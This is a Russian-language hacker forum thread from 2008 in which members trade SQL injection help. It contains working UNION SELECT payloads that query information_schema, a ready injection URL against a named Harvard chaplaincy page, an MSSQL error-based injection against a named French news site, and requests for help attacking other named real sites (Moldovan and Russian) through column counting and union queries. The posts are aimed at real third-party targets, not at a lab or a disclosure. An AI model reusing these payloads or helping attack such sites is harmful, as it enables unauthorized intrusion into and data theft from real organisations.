Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    jokester точно знать не надо, на случай если префикс у колонки
    +union+select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
     
    2 people like this.
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Нет, японял о чем ты говоришь но это не то, .Slip правильно сказал в Information_schema нет информации о содержимом полей (что вполне логично) хотя еслиб для регулярок были бы такие функции как в php (ну там карманы и все такое, то мож и можно было ченить придумать, хотя не уверен) вобще меня что то смущает в этом, но это так скорее паранойя
     
    #982 Scipio, 18 Feb 2008
    Last edited: 18 Feb 2008
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    согласен со всеми ,просто дополнял ответ .Slip он пишет "только зная таблицу"
     
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Как он выведет имя таблицы из таблицы с данными о колонках? Ведь данные из infotmation_schema.columns по сути своей считываются с выражением Where.

    PS Или Constantin'у и jokester'у пора идти читать маны, или мне:)
     
  5. Moldman

    Moldman Elder - Старейшина

    Joined:
    12 Jun 2007
    Messages:
    91
    Likes Received:
    35
    Reputations:
    -5
    Сайт http://www.faces.md/ сделан на PHP и использует MySQL но у меня мозги не шарят как найти уязвимость к коде или базе если в адресной строки ничего конкретного не отображается кроме http://www.faces.md/user/226955
    Жду помощи
     
    1 person likes this.
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 .Slip поверь это работает
     
  7. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    .Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
    з\ы или тебя сама конструкция запроса смутила?
     
    1 person likes this.
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Полностью согласен, это как в MSSQL или SYBASE в syscolumns есть информация о объектах которым принадлежат колонки (только там id объекта) а в мускуле именно имя таблицы
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 .Slip
    можно даже имя базы оттуда вытащить
    пример(бага старая найдена не мной)
    _http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58),table_name),5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x75736572+limit+1,1/*
     
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Мм.. Дам-с, лоханулся я тут.
     
    1 person likes this.
  11. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Этот прием показывал Grey
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    разговор ни о чём
    узнать имя таблицы по её содержимому нельзя, а дальше непонятная мне дискуссия про information_schema =\
    PS онтечад
     
    3 people like this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    История оценок репутации для Spyder:
    +3 Ваши вопросы по уязвимо... 18.02.2008 20:55 ZAMUT если мускул 5.х то можно

    Вот покажи мне запрос который вернёт имя таблицы, при том что я не знаю имён колонок и у меня только одно значение 123456. Кто сказал что колонка с паролями имеет в своём имени "pas", мб она называется "paroli"
    В таком случае запрос Константина
    select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
    работать не будет, и вообще это больше похоже на игру "угадай буквы в имени колонки".
    Ответ на вопрос 0nep@t0p'a нет, Слип и Scipio правильно написали, узнать таблицу по её содержимому нельзя
     
  14. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Spyder, ну да только угадайка ..
     
    #994 Roba, 18 Feb 2008
    Last edited: 18 Feb 2008
    1 person likes this.
  15. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Code:
    http://www.newspress.fr/index.asp?lang=hfg'
    собственно что енто уязвимость ? что из этого можно вообше можно выжать если вообше можно ? собственно с таким первый раз сталкиваюсь :(


    собственно при подставлении в значение ленг сужествуюшего фаыла начинаеть материться под другому тока на французком :)
     
    #995 MaSter GeN, 18 Feb 2008
    Last edited: 18 Feb 2008
  16. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Это mssql инъекция
    http://www.newspress.fr/index.asp?lang='+or+1=@@version--
     
  17. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    сенкс кстати не даш ссылочку на описаение иньекций подобного рода ?
     
  18. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Сцуко, поискать трудно самому да?
    http://forum.antichat.ru/threadnav30501-1-10.html
     
  19. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    честно лень спасибо огромное :)
     
  20. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Хочу спросить совета, и помощи в раскрутке скули, если она конечно присутствует на данном сайте: _http://lokomotiv.yar.ru

    Захожу по адресу - _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140

    При подстановке кавычки - новость со страницы пропадает, ошибки никакой не пишет, если переменную пишу id=2142-1 , то выдаёт страницу как при id=2141 то есть вроде бы скуль есть.
    Вставляю конструкцию order by и думаю, что получаю 11 столбцов, так как при таком запросе

    _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2011

    страница выводится без ошибок, а вот при таком

    _http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140%20order%20by%2012

    инфа со страницы пропадает (конкретно новость).
    Попытался продолжить с union select , и ничего не вышло, номера столбцов не выходят.
    Может кто подскажет, что не так делаю? Или может вообще глупость творю и никакой уязвимости там нет?
    Заранее всем откликнувшимся мерси.
     
Thread Status:
Not open for further replies.